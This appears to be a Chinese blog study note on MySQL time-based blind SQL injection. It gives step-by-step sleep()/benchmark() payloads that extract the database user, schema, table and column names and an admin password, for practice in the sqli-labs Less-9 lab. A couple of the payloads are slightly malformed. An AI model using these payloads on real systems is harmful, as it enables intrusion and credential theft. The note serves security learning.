2. 程式人生 > 其它 >學習筆記十五:MySQL手注之延時盲注(基於時間的盲注)

學習筆記十五:MySQL手注之延時盲注(基於時間的盲注)

阿新 發佈:2021-12-06

背景知識
格式:IF(Condition,A,B)

含義:如果Condition成立,則A,否則B

  • substr函式
  • ascii函式

延時注入

mysql>=5.0使用sleep()進行查詢

mysql<5.0使用benchmark()進行查詢

benchmark()

benchmark是通過查詢次數增多,時間變得緩慢來判斷是否存在延遲

select benchmark(1000,select * from admin);

sleep()

1.判斷是否存在延遲注入

id=1 and sleep(5)

2.判斷當前使用者

and if(ascii(substr(user(),1,1))=114,sleep(5),1)

3.判斷資料庫名長度

if(length(database())=8,sleep(5),1)

4.猜解資料庫名稱

and if(ascii(substr(database(),1,1))>100,sleep(5),1)

5.猜解表名

and if(ascii(substr((SELECT distinct concat(table_name) FROM information_schema.tables where table_schema=database() LIMIT 0,1),1,1))=116,sleep(5),1)

6.猜解列名

and if(ascii(substr((select column_name from information_schema.columns where table_name='admin' limit,0,1),1,1))>100,sleep(5),1)

7.資料

and if(ascii(substr((select password from admin limit 0,1),1,1))>100,sleep(5),1)

ps:以上實操可以在sqli-labs的Less-9中進行操作

可參考文章:

MYSQL基於時間的盲注總結 | AdminTony's Blog

Python系列之——時間盲註腳本編寫_白帽子技術/思路_i春秋社群-分享你的技術,為安全加點溫度. (ichunqiu.com)

相關推薦

學習筆記MySQL基於時間

背景知識格式IF(Condition,A,B) 含義如果Condition成立,則A,否則B substr函式 ascii函式

學習筆記MySQL聯合查詢注入

原理 union select 聯合查詢,即合併取交集,結果中沒有重複⾏前後兩個查詢;前提是前後查詢檢視必須擁有相同數量的列,列也必需擁有相同的資料型別。

學習筆記Mssql報錯注入

convert()函式 CONVERT()函式是把日期轉換為新資料型別的通用函式。 語法 CONVERT(data_type(length),data_to_be_converted,style)

學習筆記Mssql布林型

1.判斷是否存在注入 \' and 1=1 and 1=2 2.猜解資料庫名 and exists(select top 1 name from Master..SysDatabases where unicode(substring(name,1,1))=109)

學習筆記Mssql

延時函式WAITFOR DELAY WAITFOR是SQL Server中Transact-SQL提供的一個流程控制語句。它的作用就是等待特定時間,然後繼續執行後續的語句。它包含一個引數DELAY,用來指定等待的時間。如果將該語句成功注入後,會造成

MySQL學習筆記觸發器

一、觸發器概念 觸發器是與表有關的資料庫物件,在滿足定義條件觸發,並執行觸發器中定義的語句集合。

MySQL學習筆記鎖表解鎖與加行鎖

一、鎖表解鎖 #查詢是否鎖表 SHOW OPEN TABLES WHERE IN_USE>0; #查詢程序 SHOW PROCESSLIST

MySQL學習筆記事件定時任務

一、事件概述 1.1、事件簡介 事件EventMySQL在相應的時刻呼叫的過程式資料庫物件。一個事件可呼叫一次,也可週期性的啟動,它由一個特定的執行緒來管理的,也就是所謂的\"事件排程器\"。

學習筆記二十三Mssqldb_owner許可權處理

MSSQL全稱 Microsoft SQL Server 3個許可權 sysadmin \\ db_owner \\ public 許可權判斷 and 1=(select IS_SRVROLEMEMBER(\'sysadmin\')) //判斷是否是系統管理員

Go語言學習筆記--Go語言map的基本操作

基本操作都在以下程式碼裡面啦 1 package main 2 3 import \"fmt\" 4 5 func main() { 6// mapkey:value

Exchange 2013學習筆記公用資料夾

一、基礎知識 1Exchange公用資料夾專為共享訪問設計,為收集、組織資訊及與其他人共享資訊提供了一種輕鬆、有效的方式。公用資料夾以易於瀏覽的深層次結構組織內容,使用者可以在 Outlook 中看到完整層次結構,這便

校友會小程式開發筆記 小程式前端資料校驗體系的設計與實現

微信小程式前端開發框架沒有自帶的驗證功能,雖然有表單的資料控制屬性,但是略顯簡陋,且不成體系,尤其是結合後端很彆扭,因此小女子開發校友錄小程式的表單驗證時候一般有兩種方法,一是自己裸寫驗證規則,但是需

vue學習筆記 、元件掛載過程及query方式帶引數的頁面跳轉

一、 元件載入順序 元件掛載的順序 setup() -> onMounted()->onUnmounted() 主要作用

Java學習筆記面向物件封裝、繼承、多型

面向物件三大特性封裝、繼承、多型 1. 封裝 程式編寫追求“高內聚,低耦合”,高內聚即類內部資料操作細節自己完成,不允許外部干涉;低耦合即僅暴露少量的方法供外部使用。

Java學習筆記面向物件static、抽象類、介面、內部類

一、static關鍵字 1. 靜態變數多執行緒 2. 靜態方法 3. 靜態程式碼塊 用於載入初始化的資訊,類載入就執行,永久只執行一次。

Sanic二Sanic + tortoise-orm 表關聯

一、ForeignKeyField外來鍵關係欄位,此欄位表示與另一個模型的外來鍵關係 1、model_name: str 已定義的模型的名稱,必傳2、related_name: 外來鍵關係名稱3、on_delete: str 預設\"CASCADE\"   field.CASCAD

SQL Server時間

近來處理安全問題遇到的sql注入 延時函式 WAITFOR DELAY WAITFOR是SQL Server中Transact-SQL提供的⼀個流程控制語句。它的作⽤就是等待特定時間,然後繼續執⾏後 續的語句。它包含⼀個引數DELAY,⽤來指定等待的

bitset學習筆記 & 洛谷 P3674 小清新人渣的本願莫隊、bitset

推薦部落格扶蘇的bitset淺談 筆記 定義可以賦值 bitset<10> b(8);bitset<1005> b(string(\"01010101\"))

學習筆記十三MySQL報錯注入

原理詳解 當在一個聚合函式,比如count函式後面如果使用分組語句就會把查詢的一部分一部分以錯誤的形式顯示出來。

MySQL學習筆記遊標/動態SQL/臨時表/事務

一、遊標 1.1、越界標誌 在MySQL遊標中,可以宣告DECLARE CONTINUE HANDLER來操作1個越界標誌。